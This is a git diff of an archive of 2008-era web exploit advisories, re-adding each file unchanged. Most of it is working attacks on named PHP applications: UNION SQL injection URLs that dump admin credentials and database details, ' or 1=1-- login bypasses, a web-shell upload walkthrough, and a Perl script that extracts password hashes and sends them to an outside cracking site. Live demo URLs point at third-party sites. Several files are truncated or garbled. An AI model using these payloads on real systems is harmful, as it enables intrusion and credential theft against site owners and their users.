+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit 1: sql inj
+
+http://localhost/script/email.php?AgentID=[SQL]
+
+
+[SQL]
+
+-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
+
+
+sql for demo:
+
+http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
+
+
+
+Exploit 2: auth bypass
+
+login: http://localhost/script/login.php
+
+username: [real_admin_or_user_name] ' or ' 1=1--
+
+password: ZoRLu
+
+note: generally admin name: admin 
+
+
+bypass for demo:
+
+login: http://hostnomi.net/int/login.php
+
+admin: admin ' or ' 1=1--
+
+passwd: ZoRLu
+
+
+exploit 3: Rfu
+
+you login to site and edit your profile upload your_shell.php
+
+after right click to your logo and select properties. copy photo link. 
+
+paste your explorer go your_shell.php
+
+
+your_shell.php path:
+
+http://localhost/script/re_images/[id]_logo_your_shell.php
+
+
+rfu for demo:
+
+user: zorlu
+
+passwd: zorlu1 
+
+edit profile: http://hostnomi.net/int/profile.php
+
+shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
+
+
+
+exploit 4: XSS
+
+http://localhost/script/email.php?AgentID=&ListingID=">
+
+xss for demo:
+
+http://hostnomi.net/int/email.php?AgentID=&ListingID=">
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7118.txt b/platforms/php/webapps/7118.txt
index f5a91ac91..5cdaecfd1 100755
--- a/platforms/php/webapps/7118.txt
+++ b/platforms/php/webapps/7118.txt
@@ -1,54 +1,54 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Turnkeyforms Text Link Sales Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ Turnkeyforms Text Link Sales ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.turnkeyforms.com/text-link-sales.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 13.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ DTLZ ]===
-	
-	[!] here we go...
-	[»]	http://localhost/[paht]/admin.php
-
-	
-	
-===[ LIVE ]===
-
-	[»] http://demo.turnkeyforms.com/textlinkads/admin.php
-	
-	
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-14]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Turnkeyforms Text Link Sales Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ Turnkeyforms Text Link Sales ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.turnkeyforms.com/text-link-sales.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 13.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ DTLZ ]===
+	
+	[!] here we go...
+	[»]	http://localhost/[paht]/admin.php
+
+	
+	
+===[ LIVE ]===
+
+	[»] http://demo.turnkeyforms.com/textlinkads/admin.php
+	
+	
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7119.php b/platforms/php/webapps/7119.php
index c534401f9..0ac5d72fd 100755
--- a/platforms/php/webapps/7119.php
+++ b/platforms/php/webapps/7119.php
@@ -1,68 +1,68 @@
-#!/usr/bin/php
-\n别告诉我你不会用 -,-\n");
-else
-    exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");
-
-function send()
-{
-    global $host, $path, $url, $cmd;
-
-    $data = "POST ".$path."wap/index.php  HTTP/1.1\r\n";
-    $data .= "Accept: */*\r\n";
-    $data .= "Accept-Language: zh-cn\r\n";
-    $data .= "Referer: http://$host$path\r\n";
-    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-    $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
-    $data .= "Host: $host\r\n";
-    $data .= "Connection: Close\r\n";
-    $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
-    $data .= $cmd;
-
-    $fp = fsockopen($host, 80);
-    fputs($fp, $data);
-
-    $resp = '';
-
-    while ($fp && !feof($fp))
-        $resp .= fread($fp, 1024);
-
-    return $resp;
-}
-
-?>
-
-# milw0rm.com [2008-11-14]
+#!/usr/bin/php
+\n别告诉我你不会用 -,-\n");
+else
+    exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");
+
+function send()
+{
+    global $host, $path, $url, $cmd;
+
+    $data = "POST ".$path."wap/index.php  HTTP/1.1\r\n";
+    $data .= "Accept: */*\r\n";
+    $data .= "Accept-Language: zh-cn\r\n";
+    $data .= "Referer: http://$host$path\r\n";
+    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+    $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n";
+    $data .= "Host: $host\r\n";
+    $data .= "Connection: Close\r\n";
+    $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
+    $data .= $cmd;
+
+    $fp = fsockopen($host, 80);
+    fputs($fp, $data);
+
+    $resp = '';
+
+    while ($fp && !feof($fp))
+        $resp .= fread($fp, 1024);
+
+    return $resp;
+}
+
+?>
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7121.pl b/platforms/php/webapps/7121.pl
index 3be5fc119..17e721a05 100755
--- a/platforms/php/webapps/7121.pl
+++ b/platforms/php/webapps/7121.pl
@@ -1,118 +1,118 @@
-#!/usr/bin/perl
-
-=starting
-
- --------------------------------------------------------
- SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit
- --------------------------------------------------------
- by athos - staker[at]hotmail[dot]it
- 
- download on sourceforge 
- 
- 
- File edit.php
- 
- 111. if ($password == md5($_POST['password']))
- 112. {
- 113.    if (strlen($_POST['cmsText']) > 2) {
- 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".
-      strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];
- 115. mysql_query($query);
- 116. //$successfulyUpdated
- 117. responseText = $successfulyUpdated;
- 118. }
- 119.
- 120. if (strlen($_GET['pageID']) > 0) {
- 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];
- 122. $result = mysql_query($query);
- 123.
- 124.				
- 125. while($row = mysql_fetch_array($result)) {
- 126.	$pageTitle = $row['title'];
- 127.	$pageContent = $row['content'];
- 128.  }
- 129. }
- 
- NOTE: Works Regardless PHP.ini Settings!
- 
-  
-  you must be logged..
-  
-  Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]
-  
-  Output: Username: athos
-          Password: 27e43424d53719a645ae7cca038b45be
- 
- 
-
-=cut
-
-use strict;
-use LWP::UserAgent;
-use LWP::Simple;
-
-my $match = q{Editing page "(.+?)"};
-my $http = new LWP::UserAgent; 
-my $post = undef;
-my @login = ();
-my @out = ();
-
-my ($host,$auth,$myid) = @ARGV;
-
-unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)
-{
-    print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; 
-    exit;
-} 
-
-$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";
-
-@login = split(':',$auth);
-
-$post = $http->post($host,[ 
-                            username => $login[0],
-                            password => $login[1],
-                         ]);
-
-
-if($post->is_success && $post->content =~ $match) 
-{
-    @out = split(':',$1);
-   
-    if($#out => 2)
-    {
-        my $cracked = search_MD5($out[1]);
-        
-        print STDOUT "Username: $out[0]\r\n";
-        print STDOUT "Password: $out[1] -> $cracked\r\n";
-        exit;  
-   }
-   else
-   {
-       print STDOUT "Exploit Failed!\r\n";
-       print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";
-       exit;
-   }
-}
-
-
-sub search_MD5
-{
-    my $hash = shift @_;
-    my $cont = undef;
-
-    $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
-        
-    if(length($hash) => 32 && !is_error($cont))
-    {
-        return $cont;
-    }
-    else
-    {
-        return exit;
-    }
-}   
-    
-__END__
-
-# milw0rm.com [2008-11-14]
+#!/usr/bin/perl
+
+=starting
+
+ --------------------------------------------------------
+ SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit
+ --------------------------------------------------------
+ by athos - staker[at]hotmail[dot]it
+ 
+ download on sourceforge 
+ 
+ 
+ File edit.php
+ 
+ 111. if ($password == md5($_POST['password']))
+ 112. {
+ 113.    if (strlen($_POST['cmsText']) > 2) {
+ 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".
+      strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];
+ 115. mysql_query($query);
+ 116. //$successfulyUpdated
+ 117. responseText = $successfulyUpdated;
+ 118. }
+ 119.
+ 120. if (strlen($_GET['pageID']) > 0) {
+ 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];
+ 122. $result = mysql_query($query);
+ 123.
+ 124.				
+ 125. while($row = mysql_fetch_array($result)) {
+ 126.	$pageTitle = $row['title'];
+ 127.	$pageContent = $row['content'];
+ 128.  }
+ 129. }
+ 
+ NOTE: Works Regardless PHP.ini Settings!
+ 
+  
+  you must be logged..
+  
+  Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]
+  
+  Output: Username: athos
+          Password: 27e43424d53719a645ae7cca038b45be
+ 
+ 
+
+=cut
+
+use strict;
+use LWP::UserAgent;
+use LWP::Simple;
+
+my $match = q{Editing page "(.+?)"};
+my $http = new LWP::UserAgent; 
+my $post = undef;
+my @login = ();
+my @out = ();
+
+my ($host,$auth,$myid) = @ARGV;
+
+unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)
+{
+    print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; 
+    exit;
+} 
+
+$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";
+
+@login = split(':',$auth);
+
+$post = $http->post($host,[ 
+                            username => $login[0],
+                            password => $login[1],
+                         ]);
+
+
+if($post->is_success && $post->content =~ $match) 
+{
+    @out = split(':',$1);
+   
+    if($#out => 2)
+    {
+        my $cracked = search_MD5($out[1]);
+        
+        print STDOUT "Username: $out[0]\r\n";
+        print STDOUT "Password: $out[1] -> $cracked\r\n";
+        exit;  
+   }
+   else
+   {
+       print STDOUT "Exploit Failed!\r\n";
+       print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";
+       exit;
+   }
+}
+
+
+sub search_MD5
+{
+    my $hash = shift @_;
+    my $cont = undef;
+
+    $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
+        
+    if(length($hash) => 32 && !is_error($cont))
+    {
+        return $cont;
+    }
+    else
+    {
+        return exit;
+    }
+}   
+    
+__END__
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7122.txt b/platforms/php/webapps/7122.txt
index 8caa2f169..7f71bc039 100755
--- a/platforms/php/webapps/7122.txt
+++ b/platforms/php/webapps/7122.txt
@@ -1,60 +1,59 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : tryag.cc/cc  $&$ hackteach.org/cc
-
-=======================================================
-++++++++++++++++++++ Script information++++++++++++++++++++++
-=======================================================
-
-
-<<->> script        : gs-real-estate-portal
-
-<<->> script site : http://hostnomi.net/detail.php?spid=44                
-
-
-
-=======================================================
-++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-          >>>> www.site.me/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*
-
-<<->> live demo >>>
-
-         >>>> http://hostnomi.net/int/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*
-
-=======================================================
-+++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-all freinds ,  muslim , and stroke  .... and for the kids who send the message :) u just kide 
-
-# milw0rm.com [2008-11-14]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : tryag.cc/cc  $&$ hackteach.org/cc
+
+=======================================================
+++++++++++++++++++++ Script information++++++++++++++++++++++
+=======================================================
+
+
+<<->> script        : gs-real-estate-portal
+
+<<->> script site : http://hostnomi.net/detail.php?spid=44                
+
+
+
+=======================================================
+++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+          >>>> www.site.me/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*
+
+<<->> live demo >>>
+
+         >>>> http://hostnomi.net/int/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*
+
+=======================================================
++++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+all freinds ,  muslim , and stroke  .... and for the kids who send the message :) u just kide 
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7123.txt b/platforms/php/webapps/7123.txt
index f7fd65ef9..6cd576ff7 100755
--- a/platforms/php/webapps/7123.txt
+++ b/platforms/php/webapps/7123.txt
@@ -1,43 +1,43 @@
-[~] Powered By X7 Chat 2.0.5 auth bypass
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 14.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 42
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-username: ZoRLu or anything write
-
-password: ' or ' 1=1--
-
-
-login for demo:
-
-http://x7chat2demo.hostx7.com/
-
-username: ZoRLu
-
-password: ' or ' 1=1--
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-14]
+[~] Powered By X7 Chat 2.0.5 auth bypass
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 14.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 42
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+username: ZoRLu or anything write
+
+password: ' or ' 1=1--
+
+
+login for demo:
+
+http://x7chat2demo.hostx7.com/
+
+username: ZoRLu
+
+password: ' or ' 1=1--
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7124.txt b/platforms/php/webapps/7124.txt
index 3086d00d9..9baae5976 100755
--- a/platforms/php/webapps/7124.txt
+++ b/platforms/php/webapps/7124.txt
@@ -1,47 +1,47 @@
-[~] turnkeyforms Text Link Sales Remote Sql inj & xss
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 14.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 43
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit: sql inj
-
-http://localhost/script/admin.php?a=users&id=[SQL]
-
-
-[SQL]
-
-999+union+select+1,user(),database(),version(),5,6,7--
-
-
-sql for demo:
-
-http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
-
-
-xss:
-
-http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=">
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-14]
+[~] turnkeyforms Text Link Sales Remote Sql inj & xss
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 14.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 43
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit: sql inj
+
+http://localhost/script/admin.php?a=users&id=[SQL]
+
+
+[SQL]
+
+999+union+select+1,user(),database(),version(),5,6,7--
+
+
+sql for demo:
+
+http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
+
+
+xss:
+
+http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=">
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-14]
diff --git a/platforms/php/webapps/7128.txt b/platforms/php/webapps/7128.txt
index 127a1a233..ec6936b4a 100755
--- a/platforms/php/webapps/7128.txt
+++ b/platforms/php/webapps/7128.txt
@@ -1,40 +1,40 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-+                                                                                                                =
-=                          Script: clipShare Remote SQL Injection Vulnerability                                  +
-+                                                                                                                =
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
-                =                                                                                    =
-                =                            script:http://www.clip-share.com                        =
-                =                                                                                    =
-                =                               channel_detail.php?chid=                             =              
-                 =================================== Snakespc ======================================    
-D0rk: clipshare/channel_detail.php?chid=
-Dork: Powered By SalSa Creations
-
-Exploit:
-
-http://localhost/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 
-
-Demo :
-
-http://www.salsavidz.com/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 	
-                                                                      
-===================================================================================================================
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
-ALL www.Snakespc.com/SC >>>> Members 
-str0ke.....>>>>.....milw0rm
-===================================================================================================================
-
-# milw0rm.com [2008-11-15]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
++                                                                                                                =
+=                          Script: clipShare Remote SQL Injection Vulnerability                                  +
++                                                                                                                =
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
+                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
+                =                                                                                    =
+                =                            script:http://www.clip-share.com                        =
+                =                                                                                    =
+                =                               channel_detail.php?chid=                             =              
+                 =================================== Snakespc ======================================    
+D0rk: clipshare/channel_detail.php?chid=
+Dork: Powered By SalSa Creations
+
+Exploit:
+
+http://localhost/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 
+
+Demo :
+
+http://www.salsavidz.com/clipshare/channel_detail.php?chid=-1+union+select+1,concat(0x3a,username,0x3a,pwd),3+from+signup-- 	
+                                                                      
+===================================================================================================================
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
+ALL www.Snakespc.com/SC >>>> Members 
+str0ke.....>>>>.....milw0rm
+===================================================================================================================
+
+# milw0rm.com [2008-11-15]
diff --git a/platforms/php/webapps/7130.php b/platforms/php/webapps/7130.php
index 604abf5de..715678845 100755
--- a/platforms/php/webapps/7130.php
+++ b/platforms/php/webapps/7130.php
@@ -1,54 +1,54 @@
-         
-
-# milw0rm.com [2008-11-15]
+         
+
+# milw0rm.com [2008-11-15]
diff --git a/platforms/php/webapps/7131.txt b/platforms/php/webapps/7131.txt
index 50da4c46b..89783d87d 100755
--- a/platforms/php/webapps/7131.txt
+++ b/platforms/php/webapps/7131.txt
@@ -1,39 +1,39 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-+                                                                                                                =
-=                      Script: yahoo answers Remote SQL Injection Vulnerability                                  +
-+                                                                                                                =
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
-                =                                                                                    =
-                =        Sript Demo:http://www.phpstore.info/product_info.php?products_id=163        =
-                =                                                                                    =
-                =                               www.phpstore.info                                    =              
-                 =================================== Snakespc ======================================    
-
-
-Exploit:
-
-http://localhost/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	 
-
-Demo :
-
-http://phpstore.info/demos/yahooanswers/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	
-                                                                      
-===================================================================================================================
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
-ALL www.Snakespc.com/SC >>>> Members 
-str0ke.....>>>>.....milw0rm
-===================================================================================================================
-
-# milw0rm.com [2008-11-16]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
++                                                                                                                =
+=                      Script: yahoo answers Remote SQL Injection Vulnerability                                  +
++                                                                                                                =
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
